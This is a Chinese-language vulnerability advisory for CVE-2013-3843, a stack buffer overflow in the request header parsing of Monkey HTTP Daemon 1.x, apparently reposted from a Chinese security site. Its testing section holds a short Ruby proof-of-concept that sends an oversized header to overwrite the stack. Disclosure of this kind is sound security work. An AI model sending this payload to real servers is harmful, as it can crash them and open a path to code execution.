Monkey HTTP Daemon 'memcpy()'函数缓冲区溢出漏洞

发布日期:2013-06-04
更新日期:2013-06-08

受影响系统:
Monkey Monkey HTTP Daemon 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60333
 CVE(CAN) ID: CVE-2013-3843
 
Monkey HTTP Daemon是适用于GNU/Linux的轻量级Web服务器。
 
Monkey HTTP Daemon 1.2.0及其他版本在解析请求时, "mk_request_header_process()"函数(src/mk_request.c)中存在栈缓冲区溢出漏洞。
 
<*来源:Doug Prostko
 
  链接:
       
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env ruby
 
    require "socket"
 
    host = "localhost"
      port = 2001
 
    s = TCPSocket.open(host, port)
 
    buf = "GET / HTTP/1.1\r\n"
      buf << "Host: " + "\r\n"
      buf << "localhost\r\n"
      buf << "Bad: "
      buf << "A" * 2511
      buf << "B" * 4
 
      s.puts(buf)

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Monkey
 ------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pswsg.html